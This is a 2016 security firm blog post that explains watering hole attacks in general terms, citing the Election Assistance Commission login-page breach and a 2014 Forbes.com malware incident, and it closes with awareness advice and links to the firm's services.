Watering Hole Attacks: How Hackers Target You

Posted: December 29, 2016 to News.

Tags: Malware, Data Breach, Cloud Security

We may never know exactly what happened to American electorate system during 2016, who was responsible, or how it influenced the election. But there was one insight into the 2016 election hacking that will give you a true insight into what happened without any political slant. Plus, if you read more you’ll find out about a type of cyber-trap that you could’ve fallen into several times and never known it. The Election Assistance Commission was set up in 2002 to help local officials run elections. The website was home to voting guidelines, administration information, and even helped make sure voting machines were secure. However, to access the information on the site you had to make an account and log in. And that’s what hackers preyed on. According to the Federal Times, hackers set up a watering hole on the login page to collect user login information. It’s estimated that hackers got access to 100 accounts and even some that had administrative privileges on the site. The good news is the EAC site doesn’t connect with any vote counting services. The bad news is that didn’t stop the hackers from trying to turn a profit. The hackers did try to sell the credentials online, which means that these credentials could be used as a starting point for larger hacks in the future. And that’s not the end of the story either. Because watering hole attacks are very real threats online today. Usually, hackers will target a specific group with a watering hole attack strategy based on the site they set up on. For example, in 2014 China linked hackers set up a malware on Forbes.com. By targeting Forbes, the hackers were going after leaders of various industries but they took it a step further. They set the program to specifically target people with links to the defense industry. These attacks are the reason why hackers try to sell off any private information, like viewing history, they can get their hands on. Because to set up one of these attacks, you must first know the sites that your target group frequents the most. If you’re going after the defense industry that could be Forbes, but if you’re going after a human rights group or one specific company it could be another site. Once a hacker has determined the best site to infect, they’ll find a vulnerability and inject their code. After that, all it takes one click and they can infect anyone visiting the page. Watering hole attacks are dangerous because the victims usually can’t tell that they’ve been hacked, which means they’ll carry the malware to other devices and secure sites. This makes watering hole attacks especially dangerous for organizations with several employees. While the heads of a company or a hospital may have very secure devices and networks, they cannot guarantee that all their employee’s do. And since an employee will not know they’re infected they could easily infect an entire network. So, if you’re a private practice and you do everything right to protect your patient data, a simple watering hole attack could throw all that preparation out the window because of one employee. But only if you let it. If you educate yourself and everyone with access to your network on how to tell if you’ve been hacked, what to do if you have been, and how to avoid malware in the first place you’ll be ten steps ahead of most other organizations and stand a chance against hackers all over the world.

Related Resources

Learn more about how Petronella Technology Group can help:

• incident response guide
• Contact PTG for cybersecurity help